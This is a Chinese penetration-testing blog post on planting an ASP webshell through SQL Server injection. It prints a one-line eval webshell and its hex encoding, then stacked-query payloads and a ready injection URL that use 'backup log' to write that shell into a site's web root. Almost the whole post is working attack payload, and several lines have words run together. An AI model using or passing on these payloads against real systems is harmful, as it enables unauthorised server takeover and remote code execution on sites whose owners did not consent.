欢迎来到【血梦博客】 今天是:2020年08月12日 星期三
站长联系QQ:635948183
当前位置: 网站首页> 渗透测试> WEB安全之SQL注入:sqlserver备份拿WEBSHELL

WEB安全之SQL注入:sqlserver备份拿WEBSHELL

作者:血梦 日期:2020-03-18 浏览:112分类: 渗透测试 已提交百度收录

sqlserver备份拿WEBSHELL

<%execute(request("a"))%>

差异备份 经常会出错的 不稳定

log备份一句话

;IFEXISTS(select table_name from information_schema.tables wheretable_name='test_tmp')drop table test_tmp;alter database mydb set RECOVERYFULL;
; drop table test_tmp;create table test_tmp(a image);backup log mydb to disk ='C:/inetpub/wwwroot/www.demo1.com/asp.bak'with init;insert into test_tmp (a) values(0x3C25657865637574652872657175657374282261222929253EDA);backup log mydb todisk = 'C:/inetpub/wwwroot/www.demo1.com/123.asp'
;drop table test_tmp
;create table test_tmp (a image);
;backup log mydb to disk='C:/inetpub/wwwroot/www.demo1.com/asp.bak' with init;
;insert into test_tmp (a) values (0x3C25657865637574652872657175657374282261222929253EDA)
;backup log mydb to disk ='C:/inetpub/wwwroot/www.demo1.com/123.asp'
;drop table test_tmp
http://www.demo1.com/index.aspx?id=1;IFEXISTS(select table_name from information_schema.tables where table_name='test_tmp')droptable test_tmp;create table test_tmp  (a image);backup logmydb to disk ='C:/inetpub/wwwroot/www.demo1.com/asp.bak' with init;insert intotest_tmp (a) values (0x3C25657865637574652872657175657374282261222929253EDA);backuplog mydb to disk = 'C:/inetpub/wwwroot/www.demo1.com/123.asp'
select * from art where id=1;IFEXISTS(select table_name from information_schema.tables wheretable_name='test_tmp')drop table test_tmp;create table test_tmp (aimage);backup log mydb to disk ='C:/inetpub/wwwroot/www.demo1.com/asp.bak' withinit;insert into test_tmp (a) values(0x3C25657865637574652872657175657374282261222929253EDA);backup log mydb todisk = 'C:/inetpub/wwwroot/www.demo1.com/123.asp'


关灯